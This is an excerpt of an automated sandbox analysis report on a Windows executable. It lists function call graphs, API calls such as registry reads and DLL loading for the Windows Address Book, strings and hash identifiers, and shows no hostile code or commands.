                                                                        • Instruction Fuzzy Hash: 3241E8B59443159FDB27BF54DC493AAB7E8EB44F20F2100DAE90297790DB748A40CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 003828A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 217 3828a4-3828e8 memset 218 38299d-3829aa call 3832b0 217->218 219 3828ee-382912 RegOpenKeyExW 217->219 221 382989-38298f 219->221 222 382914-382947 RegQueryValueExW 219->222 221->218 223 382991-382997 RegCloseKey 221->223 222->221 225 382949-382956 222->225 223->218 226 382958-38296b ExpandEnvironmentStringsW 225->226 227 38296d-382977 GetFileAttributesW 225->227 226->221 227->221 228 382979-382984 call 381a60 227->228 228->221
                                                                        APIs
                                                                        • memset.MSVCRT ref: 003828DE
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                        • RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 0038296E
                                                                        • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        Strings
                                                                        • Software\Microsoft\WAB\DLLPath, xrefs: 00382900
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                        • String ID: Software\Microsoft\WAB\DLLPath
                                                                        • API String ID: 2763597636-3156921957
                                                                        • Opcode ID: 580f2827386fc7135b51e3fe52ed599f4d2d8a11ee4a93c10ba915957130b730
                                                                        • Instruction ID: 63637434954a25c43c0b9a9e2a4c4de483f3f8bebf7eb808594b7a3085276d4d
                                                                        • Opcode Fuzzy Hash: 580f2827386fc7135b51e3fe52ed599f4d2d8a11ee4a93c10ba915957130b730
                                                                        • Instruction Fuzzy Hash: CE215EB594131CAADB22AB25CC8CEDBB7BCAF54710F1006DAE819E2151DB704B94CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00381BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 230 381bf4-381c26 call 3828a4 PathRemoveFileSpecW 233 381c28-381c3c PathAppendW 230->233 234 381c4d-381c5b call 3832b0 230->234 233->234 236 381c3e-381c4b LoadLibraryW 233->236 236->234
                                                                        APIs
                                                                          • Part of subcall function 003828A4: memset.MSVCRT ref: 003828DE
                                                                          • Part of subcall function 003828A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                          • Part of subcall function 003828A4: RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                          • Part of subcall function 003828A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                          • Part of subcall function 003828A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00381C1E
                                                                        • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00381C34
                                                                        • LoadLibraryW.KERNELBASE(?), ref: 00381C45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                                                        • String ID: wab32res.dll
                                                                        • API String ID: 1705514897-2698570859
                                                                        • Opcode ID: 0274250c52a70154f7e8323302093e84b2c57257031618101c45fd217dea0e84
                                                                        • Instruction ID: 283c2d02f21f4e12e823c87b441d2d6c9601e8ba6f419e6f779e13da3c63a7d2
                                                                        • Opcode Fuzzy Hash: 0274250c52a70154f7e8323302093e84b2c57257031618101c45fd217dea0e84
                                                                        • Instruction Fuzzy Hash: E5F030B5A013189BCB12FBB4DC49A9EB7BCAB44700F5141E5A512E7141DB30DF05CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00381B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 238 381b83-381bc1 memset call 3828a4 241 381bc4-381bcd 238->241 241->241 242 381bcf-381bda 241->242 243 381bdc 242->243 244 381be1-381bf3 LoadLibraryW call 3832b0 242->244 243->244
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00381BA8
                                                                          • Part of subcall function 003828A4: memset.MSVCRT ref: 003828DE
                                                                          • Part of subcall function 003828A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0038290A
                                                                          • Part of subcall function 003828A4: RegQueryValueExW.KERNELBASE(?,003811FC,00000000,?,?,?,?,00000000,00000000), ref: 0038293F
                                                                          • Part of subcall function 003828A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0038295F
                                                                          • Part of subcall function 003828A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00382997
                                                                        • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 00381BE2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                                                        • String ID: wab32.dll
                                                                        • API String ID: 2792020168-2849205143
                                                                        • Opcode ID: 34f160aedc4edbad6eb2c038e7635a740684f2988a6e0baf35ca042bf1fd1098
                                                                        • Instruction ID: 548e7506e984301a4cb38f430c43e544a26250e8d32627434dafff3694358270
                                                                        • Opcode Fuzzy Hash: 34f160aedc4edbad6eb2c038e7635a740684f2988a6e0baf35ca042bf1fd1098
                                                                        • Instruction Fuzzy Hash: 68F0F67580131897CF26FB68DC4A9EBB7BCEF50310FA141D4A8169B281EA305F0ACB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 003829AB Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 247 3829ab-3829ca CommandLineToArgvW 248 3829cc-3829ea call 382a21 LocalFree 247->248 249 382a15 247->249 250 382a1a-382a20 248->250 253 3829ec-382a03 call 382a21 248->253 249->250 256 382a08-382a13 RegisterApplicationRestart 253->256 257 382a05 253->257 256->250 257->256
                                                                        APIs
                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 003829C0
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 003829DE
                                                                        • RegisterApplicationRestart.KERNELBASE(00381428,00000000,00000000), ref: 00382A0B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                        • String ID:
                                                                        • API String ID: 3182635576-0
                                                                        • Opcode ID: 5d8863324bcd84fa432ab5ca9a368a3c18394b0d79525073bc69240dfb8c9f54
                                                                        • Instruction ID: 2e8ca37e38f62ba642570382478270bf46f899c59a455a6d607910d5fa94f82a
                                                                        • Opcode Fuzzy Hash: 5d8863324bcd84fa432ab5ca9a368a3c18394b0d79525073bc69240dfb8c9f54
                                                                        • Instruction Fuzzy Hash: F1015272910319BBDB16DBD4D889BAEB7BCEF44361F6000A5E501E7100DB789E0587A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00383001 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 258 383001-383022 __getmainargs
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: __getmainargs
                                                                        • String ID:
                                                                        • API String ID: 3565562838-0
                                                                        • Opcode ID: bc9149c3b3086dc3aaf7bc75c9e398d2f1c30a89edcb38b5487429764cb30aee
                                                                        • Instruction ID: 28d93698c25b28b500096c05a7163216e85ec6f4edd86b9fcfbbae65da2e48fe
                                                                        • Opcode Fuzzy Hash: bc9149c3b3086dc3aaf7bc75c9e398d2f1c30a89edcb38b5487429764cb30aee
                                                                        • Instruction Fuzzy Hash: 95C08CF0581382AAC30337243C079D3BB109841708F0300C1E322ABCA2E2540218A752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 003825D3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 211COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 259 3825d3-38265b memset * 2 CommandLineToArgvW 260 382891-3828a1 call 3832b0 259->260 261 382661-382667 259->261 263 38287d-382886 LocalFree 261->263 264 38266d-382674 261->264 263->260 265 382888-382890 263->265 266 382683-38269e StrCmpNIW 264->266 267 382676-38267e 264->267 265->260 269 3826f0-3826f9 266->269 270 3826a0-3826a7 266->270 267->263 272 3826fb-38271c call 381a60 PathFindExtensionW 269->272 273 382757-38275f 269->273 271 3826aa-3826b3 270->271 271->271 274 3826b5-3826b9 271->274 288 38271e-38272e StrCmpIW 272->288 275 382761-382770 StrCmpIW 273->275 277 3826bb-3826bd 274->277 278 382736-38273c 274->278 279 382772-382781 275->279 280 382785-3827a2 275->280 283 3826cf-3826dd 277->283 284 3826bf-3826cd call 381b57 277->284 282 382877 278->282 279->275 285 382783 279->285 286 3827a8-3827b0 280->286 287 382873-382875 280->287 282->263 283->263 294 3826e3-3826eb 283->294 284->283 285->278 292 3827b2-3827b5 286->292 293 3827c5-3827e3 call 381a60 GetFileAttributesW 286->293 287->282 289 382730-382734 288->289 290 382741-382751 288->290 289->278 289->288 290->273 296 382818-382825 292->296 297 3827b7-3827be 292->297 303 382833-382835 293->303 304 3827e5-3827ec 293->304 294->263 299 38282c-382831 296->299 300 382827-38282a 296->300 297->296 301 3827c0 297->301 299->263 300->293 301->293 307 382840-382848 303->307 308 382837-38283e 303->308 305 3827ee-3827fd PathRemoveFileSpecW 304->305 306 382811-382816 304->306 305->306 309 3827ff-38280f GetFileAttributesW 305->309 306->282 310 38284b-382854 307->310 308->306 308->307 309->303 309->306 310->310 311 382856-382871 call 382b60 310->311 311->282 311->287
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0038261B
                                                                        • memset.MSVCRT ref: 00382633
                                                                        • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0038264D
                                                                        • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 0038268D
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 0038287E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ArgvCommandFreeLineLocal
                                                                        • String ID: /LDAP:
                                                                        • API String ID: 439219084-3282177907
                                                                        • Opcode ID: 80c34f077a4e49a8a6b242619563798fd361d4c214c440917a2b25b29615c049
                                                                        • Instruction ID: 941596b53bece9793771b9b4e3209ce2a4d528e6a91e56ddead0b16d7c883b01
                                                                        • Opcode Fuzzy Hash: 80c34f077a4e49a8a6b242619563798fd361d4c214c440917a2b25b29615c049
                                                                        • Instruction Fuzzy Hash: 3B816075A013289FCF26EF24DC88AAAB7B9FF58300F1541E9E51AD7251DB309E858F50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00382A7E Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 314 382a7e-382a8c 315 382a8e-382a90 314->315 316 382a95-382aa1 314->316 317 382b5b-382b5d 315->317 318 382aaa 316->318 319 382aa3 316->319 320 382aac-382ab3 318->320 319->320 321 382aa5-382aa8 319->321 322 382ab5 320->322 323 382ab7-382abb 320->323 321->318 321->320 322->323 324 382ac1-382ac3 323->324 325 382b54 323->325 324->325 327 382ac9-382add GetProcessHeap HeapAlloc 324->327 326 382b59-382b5a 325->326 326->317 327->325 328 382adf-382ae3 327->328 329 382b1c-382b22 328->329 330 382ae5-382afd memcpy 328->330 331 382b2d-382b31 329->331 332 382b24-382b2b 329->332 333 382b0b-382b0f 330->333 334 382aff-382b06 330->334 335 382b33-382b3e GetProcessHeap HeapFree 331->335 336 382b44-382b52 331->336 332->331 332->332 333->331 338 382b11-382b18 333->338 334->334 337 382b08 334->337 335->336 336->326 337->333 338->338 339 382b1a 338->339 339->331
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(8,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?), ref: 00382ACC
                                                                        • HeapAlloc.KERNEL32(00000000,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382AD3
                                                                        • memcpy.MSVCRT ref: 00382AEB
                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382B37
                                                                        • HeapFree.KERNEL32(00000000,?,00382BA4,?,?,8000FFFF,00000000,?,?,?,0038286D,?,?), ref: 00382B3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                        • String ID: m(8
                                                                        • API String ID: 3405790324-3390150485
                                                                        • Opcode ID: 702255b6b7e7f2b160cbe6b7f49f0db01dcc502ab9596a1febf49895ed70d446
                                                                        • Instruction ID: b4d6e3fdce876769317b238cf0f2be9877b7654282fd5d72c81ddc72eeab63f9
                                                                        • Opcode Fuzzy Hash: 702255b6b7e7f2b160cbe6b7f49f0db01dcc502ab9596a1febf49895ed70d446
                                                                        • Instruction Fuzzy Hash: CE2105B1A02752AFDB2B7E2CD984B17BBA9FF04314F1241A5E9158B290DBB4DC50C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00383675 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 340 383675-383698 341 38369a-38369c 340->341 342 38369e-3836eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 340->342 341->342 343 383702-38370c 341->343 344 3836ed-3836f3 342->344 345 3836f5-3836fa 342->345 344->345 346 3836fc 344->346 345->346 346->343
                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003836A2
                                                                        • GetCurrentProcessId.KERNEL32 ref: 003836B1
                                                                        • GetCurrentThreadId.KERNEL32 ref: 003836BA
                                                                        • GetTickCount.KERNEL32 ref: 003836C3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 003836D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: 3c66073d265dbf93922b5907d500e362b582fad0a74d9f38754306936aec381d
                                                                        • Instruction ID: b898e73fffa46f3002df14aac451c6e5584da86ed0fa37902f658de54c9b6b9c
                                                                        • Opcode Fuzzy Hash: 3c66073d265dbf93922b5907d500e362b582fad0a74d9f38754306936aec381d
                                                                        • Instruction Fuzzy Hash: F211ECB1D01709EBCB11DFB8EA8869EBBF8FF58755F614495D501EB250E6309B009B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 003832C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003833F6,`@8), ref: 003832C7
                                                                        • UnhandledExceptionFilter.KERNEL32(003833F6,?,003833F6,`@8), ref: 003832D0
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,003833F6,`@8), ref: 003832DB
                                                                        • TerminateProcess.KERNEL32(00000000,?,003833F6,`@8), ref: 003832E2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 7d3ebaa92c4ee39b770b4dc24a04e0ea0bedf52e4bf20b771b9f77f15a9c6119
                                                                        • Instruction ID: b26090d9c2a1b7b2c98d33c520ab9425b5b97c5bdf681aa64af2db7000d7a063
                                                                        • Opcode Fuzzy Hash: 7d3ebaa92c4ee39b770b4dc24a04e0ea0bedf52e4bf20b771b9f77f15a9c6119
                                                                        • Instruction Fuzzy Hash: 93D0CAB2000B08AFDB022BE1EC0CE493E2CFB88322F044480F30ECA020CB3188118BA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00383450 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 00383455
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 970d35460f36341920b5c0a96055e706990403e02750d17d54585627d00f8969
                                                                        • Instruction ID: a2e6edfefcac751a8d088ccd6369171e21d3f8ac7c40b5acdd1fcf2da2c2fc5c
                                                                        • Opcode Fuzzy Hash: 970d35460f36341920b5c0a96055e706990403e02750d17d54585627d00f8969
                                                                        • Instruction Fuzzy Hash: E29002B035570046864327715C2E58529946A48B0BB9204D0E005C6159DB5041015751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00383530 Relevance: 1.3, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 58
                                                                        • API String ID: 0-1845685940
                                                                        • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                        • Instruction ID: 77eec80bccae791ad3b8a300226f5ccfcbba4eb8be0b00b09c77ad234688030a
                                                                        • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                        • Instruction Fuzzy Hash: 91F0A0337142105B8B448B4EDC8097EB3DADEC5B3471A80AAE5098B702EA34ED428394
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00382F80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 003834D8: GetModuleHandleW.KERNEL32(00000000), ref: 003834DF
                                                                        • __set_app_type.MSVCRT ref: 00382F92
                                                                        • __p__fmode.MSVCRT ref: 00382FA8
                                                                        • __p__commode.MSVCRT ref: 00382FB6
                                                                        • __setusermatherr.MSVCRT ref: 00382FD7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 3d7cf1b5ff69bc201e8c39074a4372e5fed712c328b1b046e3b96e48b786bd32
                                                                        • Instruction ID: 5886fce979e3f512c95724947a126ec817d3672a5a0c0cb5eb42fbcf1c77d1e7
                                                                        • Opcode Fuzzy Hash: 3d7cf1b5ff69bc201e8c39074a4372e5fed712c328b1b046e3b96e48b786bd32
                                                                        • Instruction Fuzzy Hash: 73F0F2B85447028FC71BBB70EC0A2193BA8BB05B21F2146D9E5629ABE1EBB58150CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%